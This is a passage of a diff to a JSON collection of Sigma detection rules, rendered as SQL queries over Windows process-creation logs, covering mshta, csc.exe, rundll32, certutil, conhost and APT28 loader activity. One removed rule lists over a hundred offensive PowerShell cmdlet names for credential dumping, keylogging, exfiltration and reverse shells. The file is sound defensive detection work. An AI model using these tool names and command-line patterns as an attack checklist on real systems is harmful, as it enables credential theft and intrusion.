Channel = 'Security' AND NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' AND (CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.lnk%' ESCAPE '\\' OR CommandLine LIKE '%.xls%' ESCAPE '\\' OR CommandLine LIKE '%.doc%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_ngrok.yml" + "filename": "proc_creation_win_mshta_susp_execution.yml" }, { - "title": "Execution from Suspicious Folder", - "id": "3dfd06d2-eaf4-4532-9555-68aca59f57c4", - "status": "experimental", - "description": "Detects a suspicious execution from an uncommon folder", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "title": "Suspicious Csc.exe Source File Folder", + "id": "dcaa3f04-70c3-427a-80b4-b870d73c94c4", + "status": "test", + "description": "Detects a suspicious execution of csc.exe, which uses a source in a suspicious folder (e.g. AppData)", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036" + "attack.t1027.004" ], "falsepositives": [ - "Unknown" + "Legitimate software from program files - https://twitter.com/gN3mes1s/status/1206874118282448897", + "Legitimate Microsoft software - https://twitter.com/gabriele_pippi/status/1206907900268072962" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Intel\\\\Logs\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RSA\\\\MachineKeys\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\NetworkService\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Help\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Media\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\repair\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\security\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\') OR NewProcessName LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\csc.exe' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) AND NOT (ParentProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\' OR (ParentProcessName LIKE '%\\\\sdiagnhost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\choco.exe' ESCAPE '\\') OR ParentCommandLine LIKE '%\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Protection%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_execution_path.yml" + "filename": "proc_creation_win_csc_susp_folder.yml" }, { - "title": "Process Access via TrolleyExpress Exclusion", - "id": "4c0aaedc-154c-4427-ada0-d80ef9c9deb6", - "status": "experimental", - "description": "Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory", - "author": "Florian Roth (Nextron Systems)", + "title": "Sofacy Trojan Loader Activity", + "id": "ba778144-5e3d-40cf-8af9-e28fb1df1e20", + "status": "test", + "description": "Detects Trojan loader activity as used by APT28", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ + "attack.g0007", + "attack.execution", + "attack.t1059.003", "attack.defense_evasion", - "attack.t1218.011", - "attack.credential_access", - "attack.t1003.001" + "car.2013-10-002", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%\\\\TrolleyExpress 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe -ma %' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' AND NOT ((OriginalFileName LIKE '%CtxInstall%' ESCAPE '\\') OR (OriginalFileName = '')))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\%APPDATA\\%\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.dat\",%' ESCAPE '\\' OR (CommandLine LIKE '%.dll\",#1' ESCAPE '\\' OR CommandLine LIKE '%.dll #1' ESCAPE '\\' OR CommandLine LIKE '%.dll\" #1' ESCAPE '\\')))" ], - "filename": "proc_creation_win_citrix_trolleyexpress_procdump.yml" + "filename": "proc_creation_win_apt_sofacy.yml" }, { - "title": "Potential Conti Ransomware Activity", - "id": "689308fc-cfba-4f72-9897-796c1dc61487", - "status": "test", - "description": "Detects a specific command used by the Conti ransomware group", - "author": "frack113", + "title": "Suspicious NTLM Authentication on the Printer Spooler Service", + "id": "bb76d96b-821c-47cf-944b-7ce377864492", + "status": "experimental", + "description": "Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service", + "author": "Elastic (idea), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.impact", - "attack.s0575", - "attack.t1486" + "attack.privilege_escalation", + "attack.credential_access", + "attack.t1212" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-m %' ESCAPE '\\' AND CommandLine LIKE '%-net %' ESCAPE '\\' AND CommandLine LIKE '%-size %' ESCAPE '\\' AND CommandLine LIKE '%-nomutex %' ESCAPE '\\' AND CommandLine LIKE '%-p \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND (CommandLine LIKE '%spoolss%' ESCAPE '\\' OR CommandLine LIKE '%srvsvc%' ESCAPE '\\' OR CommandLine LIKE '%/print/pipe/%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_conti_ransomware_commands.yml" + "filename": "proc_creation_win_rundll32_ntlmrelay.yml" }, { - "title": "Arbitrary Shell Command Execution Via Settingcontent-Ms", - "id": "24de4f3b-804c-4165-b442-5a06a2302c7e", + "title": "HackTool - SharpEvtMute Execution", + "id": "bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c", "status": "experimental", - "description": "The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create \"shortcuts\" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.", - "author": "Sreeman", + "description": "Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1204", - "attack.t1566.001", - "attack.execution", - "attack.initial_access" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%.SettingContent-ms%' ESCAPE '\\' AND NOT (CommandLine LIKE '%immersivecontrolpanel%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpEvtMute.exe' ESCAPE '\\' OR Description = 'SharpEvtMute' OR (CommandLine LIKE '%--Filter \"rule %' ESCAPE '\\' OR CommandLine LIKE '%--Encoded --Filter \\\\\"%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent.yml" + "filename": "proc_creation_win_hktl_sharpevtmute.yml" }, { - "title": "Procdump Execution", - "id": "2e65275c-8288-4ab4-aeb7-6274f58b6b20", + "title": "Suspicious Rundll32 Execution With Image Extension", + "id": "4aa6040b-3f28-44e3-a769-9208e5feb5ec", "status": "experimental", - "description": "Detects usage of the SysInternals Procdump utility", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of Rundll32.exe with DLL files masquerading as image files", + "author": "Hieu Tran", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.t1218.011" ], "falsepositives": [ - "Legitimate use of procdump by a developer or administrator" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.exe') AND (CommandLine LIKE '%.bmp%' ESCAPE '\\' OR CommandLine LIKE '%.cr2%' ESCAPE '\\' OR CommandLine LIKE '%.eps%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.ico%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.nef%' ESCAPE '\\' OR CommandLine LIKE '%.orf%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.raw%' ESCAPE '\\' OR CommandLine LIKE '%.sr2%' ESCAPE '\\' OR CommandLine LIKE '%.tif%' ESCAPE '\\' OR CommandLine LIKE '%.tiff%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_procdump.yml" + "filename": "proc_creation_win_rundll32_susp_execution_with_image_extension.yml" }, { - "title": "Proxy Execution via Wuauclt", - "id": "af77cf95-c469-471c-b6a0-946c685c4798", + "title": "New Root Certificate Installed Via Certutil.EXE", + "id": "d2125259-ddea-4c1c-9c22-977eb5b29cf0", "status": "test", - "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team", + "description": "Detects execution of \"certutil\" with the \"addstore\" flag in order to install a new certificate on the system.\nAdversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.\n", + "author": "oscd.community, @redcanary, Zach Stanford @svch0st", "tags": [ "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.t1553.004" ], "falsepositives": [ - "Unknown" + "Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%RunHandlerComServer%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /UpdateDeploymentProvider UpdateDeploymentProvider.dll %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%/addstore%' ESCAPE '\\' OR CommandLine LIKE '%-addstore%' ESCAPE '\\') AND CommandLine LIKE '%root%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_wuauclt.yml" + "filename": "proc_creation_win_certutil_certificate_installation.yml" }, { - "title": "PUA - RunXCmd Execution", - "id": "93199800-b52a-4dec-b762-75212c196542", + "title": "Suspicious Use of CSharp Interactive Console", + "id": "a9e416a8-e613-4f8b-88b8-a7d1d1af2f61", "status": "test", - "description": "Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of CSharp interactive console by PowerShell", + "author": "Michael R. (@nahamike01)", "tags": [ "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.t1127" ], "falsepositives": [ - "Legitimate use by administrators" + "Possible depending on environment. Pair with other factors such as net connections, command-line args, etc." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% /account=system %' ESCAPE '\\' OR CommandLine LIKE '% /account=ti %' ESCAPE '\\') AND CommandLine LIKE '%/exec=%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\csi.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND OriginalFileName = 'csi.exe')" ], - "filename": "proc_creation_win_pua_runxcmd.yml" + "filename": "proc_creation_win_csi_use_of_csharp_console.yml" }, { - "title": "Malicious PowerShell Commandlets - ProcessCreation", - "id": "02030f2f-6199-49ec-b258-ea71b07e03dc", + "title": "Conhost Parent Process Executions", + "id": "7dc2dedd-7603-461a-bc13-15803d132355", "status": "experimental", - "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the conhost execution as parent process. Can be used to evaded defense mechanism.", + "author": "omkar72", "tags": [ - "attack.execution", - "attack.discovery", - "attack.t1482", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1069", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Add-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Add-Persistence%' ESCAPE '\\' OR CommandLine LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Check-VM%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR CommandLine LIKE '%Decrypt-Hash%' ESCAPE '\\' OR CommandLine LIKE '%Do-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR CommandLine LIKE '%Exploit-Jboss%' ESCAPE '\\' OR CommandLine LIKE '%Find-Fruit%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR CommandLine LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR CommandLine LIKE '%Get-ChromeDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR CommandLine LIKE '%Get-FoxDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-GPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-IndexedItem%' ESCAPE '\\' OR CommandLine LIKE '%Get-Keystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-LSASecret%' ESCAPE '\\' OR CommandLine LIKE '%Get-PassHashes%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RickAstley%' ESCAPE '\\' OR CommandLine LIKE '%Get-Screenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServicePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR CommandLine LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-System%' ESCAPE '\\' OR CommandLine LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR CommandLine LIKE '%Get-Unconstrained%' ESCAPE '\\' OR CommandLine LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-VaultCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR CommandLine LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR CommandLine LIKE '%HTTP-Login%' ESCAPE '\\' OR CommandLine LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR CommandLine LIKE '%Install-SSP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Certify%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DAFT%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DCSync%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Farmer%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Gopher%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Grouper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Lockless%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MITM6%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PortScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PSInject%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RunAs%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SCShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StandIn%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tater%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Whisker%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WireTap%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR CommandLine LIKE '%MailRaider%' ESCAPE '\\' OR CommandLine LIKE '%New-HoneyHash%' ESCAPE '\\' OR CommandLine LIKE '%New-InMemoryModule%' ESCAPE '\\' OR CommandLine LIKE '%Out-Minidump%' ESCAPE '\\' OR CommandLine LIKE '%Port-Scan%' ESCAPE '\\' OR CommandLine LIKE '%PowerBreach%' ESCAPE '\\' OR CommandLine LIKE '%powercat %' ESCAPE '\\' OR CommandLine LIKE '%PowerUp%' ESCAPE '\\' OR CommandLine LIKE '%PowerView%' ESCAPE '\\' OR CommandLine LIKE '%Remove-Update%' ESCAPE '\\' OR CommandLine LIKE '%Set-MacAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Set-Wallpaper%' ESCAPE '\\' OR CommandLine LIKE '%Show-TargetScreen%' ESCAPE '\\' OR CommandLine LIKE '%Start-CaptureServer%' ESCAPE '\\' OR CommandLine LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR CommandLine LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' AND NOT ((Provider_Name = 'SystemTraceProvider-Process') OR (Provider_Name = 'Microsoft-Windows-Kernel-Process' AND NewProcessName LIKE '%\\\\git.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% show --textconv %' ESCAPE '\\' OR ParentCommandLine LIKE '% cat-file -s %' ESCAPE '\\')) OR (ParentCommandLine LIKE '%C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0x4%' ESCAPE '\\' AND (CommandLine LIKE '% show --textconv %' ESCAPE '\\' OR CommandLine LIKE '% cat-file -s %' ESCAPE '\\')) OR (Provider_Name = 'Microsoft-Windows-Kernel-Process' AND (ParentCommandLine LIKE '% cat-file -s %' ESCAPE '\\' OR ParentCommandLine LIKE '%show --textconv%' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR ((ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0x4' ESCAPE '\\' OR ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0xffffffff -ForceV1' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR ((ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0xffffffff -ForceV1''' ESCAPE '\\' OR ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0x4''' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\Program Files\\\\Git\\\\mingw64\\\\bin\\\\git.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_malicious_cmdlets.yml" + "filename": "proc_creation_win_conhost_susp_child_process.yml" }, { - "title": "Download Arbitrary Files Via PresentationHost.exe", - "id": "b124ddf4-778d-418e-907f-6dd3fc0d31cd", + "title": "UAC Bypass via Windows Firewall Snap-In Hijack", + "id": 